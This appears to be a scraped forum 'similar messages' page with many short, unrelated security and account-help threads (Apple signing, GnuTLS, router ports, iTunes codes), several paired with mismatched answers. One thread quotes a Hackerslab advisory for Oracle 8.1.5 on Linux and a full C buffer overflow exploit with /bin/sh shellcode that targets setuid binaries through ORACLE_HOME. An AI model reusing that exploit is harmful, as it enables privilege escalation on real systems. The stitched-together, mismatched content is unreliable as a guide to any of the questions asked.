FTP security vulnerability or what ?

Similar Messages

• HT202802 What "security vulnerability" will be opened by using this signing technique?

  Regarding article: HT202802
  OS X: Using AppleScript with Accessibility and Security features in Mavericks - Apple Support
  The article says:
  Important: Signing an applet using the following method introduces a security vulnerability that could allow malicious software to use Accessibility without user permission.
  1. What "security vulnerability" will be opened by using this signing technique?
  2. Does signing this way only make the App its applied to vulnerable only? and then the whole computer vulnerable depending on how extensive the app's reach is to the rest of the computer?
  3. More information: My app only relates to the Reminders app and bunch of Finder items....nothing internet based, etc.  That being said, is this still a vulnerability to my computer?
  "Note: If you have your own signing identity, you may use that identity in place of “-” for the -s option." 
  1. What is "my own signing identity?" and if I don't have one, would it add security to get one and use it here?
  Thanks for the help in advance!

  1) There are a few system features, including accessibility, that will override any and all other security protections on you machine. This is the vulnerability. In giving the script the ability to control your machine, you give control of your machine to the script.
  2) By signing the script, that control is permanent. If the app doesn't do anything malicious, there is no problem. But malicious apps sometimes don't manifest until later.
  3) Did you write the app? If so, then there is nothing to worry about. If not, then how much do you trust the author of the app?
  Generally, this isn't too big a deal. Apple is very protective, but most people generally hand over their passwords to anyone. They shouldn't, of course, but generally they do. They don't realize the extent to which they have handed over control of their machine and all of their data. Apple is trying to point that out.

• Security vulnerability in Oracle 8.1.5

  The following email was forwarded to me about possible security vulnerabilities.
  I am looking for verification from both Oracle and the user comunity.
  ================================================================================
  [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
  ================================================================================
  File : Oracle 8.1.5
  SYSTEM : LINUX
  Tested by RedHat Linux 6.2
  INFO :
  There are two security vulnerability in Oracle.
  1. buffer overflow
  It is possible to create a buffer overflow vulnerability using "ORACLE_HOME",
  one of the environmental value of Oracle.
  Oracle applications that are vulnerable to buffer overflow are as follow :
  - names
  - namesctl
  - onrsd
  - osslogin
  - tnslsnr
  - tnsping
  - trcasst
  - trcroute
  Thease applications allow an attacker to excute a buffer overflow exploit.
  2. Log-files created
  When a user excutes one of Oracle applications such as names, oracle or tnslsnr,
  following log files are created.
  names
  ======
  -rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
  -rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
  -rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
  oracle
  ======
  -rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
  tnslsnr
  =======
  -rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
  SOLUTION
  Contact your vendor for a patch or close setuid permission.
  # su - oracle
  $ cd /oracle_8.1.5_install_directory/bin
  $ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
  ==-------------------------------------------------------------------------------==
  * ** ** * [email protected] [yong-jun, kim]
  * ** ** * [ [URL=http://www.hackerslab.org]http://www.hackerslab.org ]
  ******** HACKERSLAB (C) since 1999
  ==-------------------------------------------------------------------------------==
  Oracle 8.1.5 exploit
  -by loveyou
  offset value : -500 ~ +500
  #include <stdio.h>
  #include <stdlib.h>
  #define BUFFER 800
  #define NOP 0x90
  #define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
  char shellcode[] =
  /* - K2 - */
  /* main: */
  "\xeb\x1d" /* jmp callz */
  /* start: */
  "\x5e" /* popl %esi */
  "\x29\xc0" /* subl %eax, %eax */
  "\x88\x46\x07" /* movb %al, 0x07(%esi) */
  "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
  "\x89\x76\x08" /* movl %esi, 0x08(%esi) */
  "\xb0\x0b" /* movb $0x0b, %al */
  "\x87\xf3" /* xchgl %esi, %ebx */
  "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
  "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
  "\xcd\x80" /* int $0x80 */
  "\x29\xc0" /* subl %eax, %eax */
  "\x40" /* incl %eax */
  "\xcd\x80" /* int $0x80 */
  /* callz: */
  "\xe8\xde\xff\xff\xff" /* call start */
  "/bin/sh";
  unsigned long getesp(void)
  __asm__("movl %esp,%eax");
  int main(int argc, char *argv[])
  char buff, ptr,binary[120];
  long *addr_ptr, addr;
  int bsize=BUFFER;
  int i,offset;
  offset = 0 ;
  if ( argc > 1 ) offset = atoi(argv[1]);
  buff = malloc(bsize);
  addr = getesp() - 5933 - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
  *(addr_ptr++) = addr;
  memset(buff,bsize/2,NOP);
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
  *(ptr++) = shellcode;
  buff[bsize - 1] = '\0';
  setenv("ORACLE_HOME",buff,1);
  printf("[ offset:%d buffer=%d ret:0x%x ]\n",
  offset,strlen(buff),addr);
  system(PATH);
  null

  Hi Peter,
  I was told that Oracle8 and Oracle8i Parallel Server on IBM
  RS/6000 AIX comes with its own Lock Manager and this LM does not
  rely on the Cluster Lock Manager (cllockd) of HACMP for AIX, as
  Oracle7 Parallel Server on normal (non-SP) RS/6000 does.
  (Oracle7 Parallel Server on RS/6000 SP didn't use the cllockd of
  HACMP but came with a special LM.)
  Cluster-wide Filesystems are not used for OPS on Unix, as far as
  I know Unix (AIX, Solaris). All Data-, Log- and Control-Files
  must reside on concurrently (!) accessible Raw-Devices (e.g. Raw
  Logical Volumes on AIX).
  So I guess it should be possible for Oracle to port OPS to Linux.
  No special Cluster-Services would be needed for OPS on Linux,
  just a shared SCSI-bus (e.g.) and a fast interconnect (e.g.
  100BaseT).
  Peter Sechser (guest) wrote:
  : Dave,
  : Parallel Server needs some cluster services in order to
  : communicate between several nodes. So, the operating system has
  : to offer things like inter-node communication services,
  : cluster-wide lock communication services and a clusterwide
  : filesystem. I'm not quite sure, to what degree Linux
  offers/will
  : offer these services.
  : Peter
  null

• JComboBox makes for nice security vulnerability under X11?

  I noticed a couple years ago that when I set a breakpoint inside a JComboBox state change event handler on a Java application or applet running under X11, the entire desktop would hang. Back then, I checked the Swing bug database and found an issue regarding this, but it was closed with an evaluation that pretty much simply said that the developer didn't know how to fix it.
  When I brought this up in the netbeans mailing list, someone suggested that this could be a security issue if someone intentionally/programmatically stopped all processing from within this event handler (perhaps from an applet). Perhaps, as a security vulnerability this bug would get more attention!
  Well, it's been over a year and the latest JDK 1.6b10 (build 25) still has this problem. So, obviously it's not bothering anyone, except me, enough to do anything about it. I could try to file this bug under Swing again (probably with same outcome) or try filing it as a security bug. What are people's thoughts?

  Hi
  Try going here:
  http://europe.nokia.com/A4423034
  Or alternatively : find the product pages for the 5700 by going to www.nokia.com/phones, then pick out 5700, then dip into "PC software" and "Music"
  Cheers

• Upgrade to GnuTLS 3.2.12 to Avoid Security Vulnerability

  Per ArsTechnica, RedHat discovered a security vulnerability in GnuTLS and published an alert on March 3. Thanks to andyrtr, the safe version (3.2.12-1) was pushed into extra on March 3 (i.e., same day).
  You might consider updating GnuTLS.
  Further details
  http://arstechnica.com/security/2014/03 … sdropping/
  Last edited by snakeroot (2014-03-04 23:53:21)

  nourathar wrote:
  nomorewindows wrote:pacman -Qi gnutls would give this for installed applications that use it.
  Hi nomorewindows,
  $ pacman -Qi gnutls
  Name : gnutls
  Version : 3.2.12-1
  Description : A library which provides a secure layer over a reliable transport layer
  Architecture : x86_64
  URL : http://www.gnutls.org/
  Licenses : GPL3 LGPL2.1
  Groups : None
  Provides : None
  Depends On : gcc-libs libtasn1 readline zlib nettle p11-kit
  Optional Deps : None
  Required By : ffmpeg filezilla glib-networking gnome-vfs gst-plugins-bad libimobiledevice smbclient
  Optional For : None
  Conflicts With : None
  Replaces : None
  Installed Size : 4703.00 KiB
  Packager : Andreas Radke <[email protected]>
  Build Date : Mon 03 Mar 2014 04:09:47 PM CET
  Install Date : Tue 04 Mar 2014 11:24:30 PM CET
  Install Reason : Installed as a dependency for another package
  Install Script : Yes
  Validated By : Signature
  the output is very different though and in my case  it lists only 7 packages.
  It makes me really wonder what 'whoneeds' actually does ?
  I suppose 'whoneeds' lists all the packages I have installed that require one of these 7 and so recursively on ?
  ciao,
  J.
  Notice it said 49 of his 495 packages.  And also notice that the same ones listed in your output are also in his output above.

• WRT1900AC - Open Port - 52147 - Security Vulnerability?

  I recently noticed in the router logs incoming connections on port 52147. I have confirmed that this port on the router is open (not closed or stealthed), by using the port scan tool at www.grc.com.  See port scan screenshot below.
  This situation is present with no devices connected to my internal network. My router is on the current firmware (1.1.8.164461).
  Anyone have an idea what is going on?
  Jeff
  Incoming log
  Source IP address | Destination port number
  110.93.76.194          52147 
  73.52.28.251            52147

  Yes, I did setup a Smart Wifi account during initial setup.
  It there any documentation where I can confirm that the port is open for Smart Wifi services, and should I be concerned about the inbound connections listed in the log (See above)?
  I am seeing a few more random IP addresses associated with that port in the log each day or so, and I would think that if it was due to legitimate Smart Wifi services activity, the traffic would be from a specific (and documented) address for Linksys servers.
  UPDATE: I just checked the log again, and there are a dozen or so random IP addesses in the Incoming Log associated with port 52147. Who-Is lookups place these addresses all around the world. Until this is explained to my satisfaction, I am leaving my devices disconnected from this router, and treating this as a security vulnerability.
  If anyone has any information or insight into this, it would be greatly appreciated.

• Diff between FTP & Secured FTP

  Hi,
    What is the diff between FTP & Secured FTP.
  Thanks
  Koteswa Rao

  Rao,
  The File Adapter does not support SFTP (File Transfer over SSH). It supports FTPS.
  U may view this here at point 28 in SAP Note: 821267
  Just an add-on, if u want to view the difference between FTPS (that XI supports) and SFTP, please refer this link
  http://www.enterprisedt.com/forums/viewtopic.php?p=136&sid=28d66491b43c6bf90448deea4936bc15
  . SAP is looking into this. Please see this thread on this discussion:
  SFTP supports in SAP Netweaver 2004s
  ---Satish

• I tried to buy an app and itunes keeps asking for a security code.  What is a security code?  I do not have one.  I have a password.

  I tried to buy an app and itunes keeps asking for a security code.  What is a security code?  I only have a password! And ID

  Are you using a credit card?
  http://store.apple.com/au/help/payments#creditus
  Security codes
  The credit card security code is a unique three or four digit number printed on the front (American Express) or back (Visa/MasterCard) of your card.

• HT201269 When I try to setup my new iPad air, I go through all the steps for the iCloud sign-in and choosing security questions and what not. But after I hit the agree to the terms and conditions... It says Apple ID could not be created because of a serve

  When I try to setup my new iPad air, I go through all the steps for the iCloud sign-in and choosing security questions and what not. But after I hit the agree to the terms and conditions... It says Apple ID could not be created because of a server error. Have no clue what to do... I've restarted the iPad and get the same message. But my internet works just fine.

  1. Turn router off for 30 seconds and on again
  2. Settings>General>Reset>Reset Network Settings

• I can't change the email on my iCloud account on my iPhone because I can't remember the password, and I can't remember one of the security questions. What do I do?

  I can't change the email on my iCloud account on my iPhone because I can't remember the password, and I can't remember one of the security questions. What do I do?

  Hi karen615,
  Welcome to the Apple Support Communities!
  If you cannot reset your Apple ID password via security questions, you can reset via email authentication. If you are not receiving the email, it may be necessary to contact Apple Support using the link in the Get help section toward the bottom of the article. 
  If you forgot your Apple ID password - Apple Support
  Best regards,
  Joe

• Iphone 3G Software Update Fixes security vulnerability associated with viewing malicious PDF files?

  Is there an Iphone 3G Software Update Fixes security vulnerability associated with viewing malicious PDF files?  Latest version I can download is 4.2.1
  I assume no fix is available, does anyone know if I'm still vulnerable to the security bug?

  No fix is needed since that vulnarability isn't in 4.2.1.

• We use an add-on in one of our online solutions and we've identified a security vulnerability. The issue has been addressed in our latest add-ons and we would like to know how we may blocklist our previous player through a firefox update?

  We use an add-on in one of our online solutions and we've identified a security vulnerability. The issue has been addressed in our latest add-ons and we would like to know how we may blocklist our previous player through a firefox update?

  You can file a bug report to do that request.
  http://developer.mozilla.org/en/docs/Bug_writing_guidelines

• Im having problem with my itunes, i tried to put new gift card abunch of time but its always tells me that in put invalid security code.. what should i do now?

  Im having problem with my itunes, i tried to put  new gift card abunch of times but it keep telling me Invalid security code. What should i do now pls. help me, can't update all my apps anymore they dont let me!!

  you have to log in to your account on the computer iTunes and edit your payment information there.
  iTunes Store: Changing Account Information
  http://support.apple.com/kb/HT1918

• When you create your Game Center ID, it does a Security Question, for what reason? It never asks you it!

  When you create your Game Center ID, it does a security question, for what reason? It never asks you it!

  App store frequently asked questions
  http://support.apple.com/kb/HT2001
  http://support.apple.com/kb/HE37

• Can't reset password for apple ID I use for iCloud because email is no longer in use and cite refuses to accept answer to security question. What do I do?

  I can't reset the password for the apple id I use for iCloud because the associated email address is no longer in use and the site does not accept my answer to the security question. What should I do?

  Welcome to the Apple Community.
  If you don't receive a reset email or you don't have a rescue address, you should contact AppleCare who will initially try to assist you with a reset email or if unsuccessful will pass you to the security team to reset your account/security questions for you.
  If you are in a region that doesn't have international telephone support try contacting Apple through iTunes Store Support.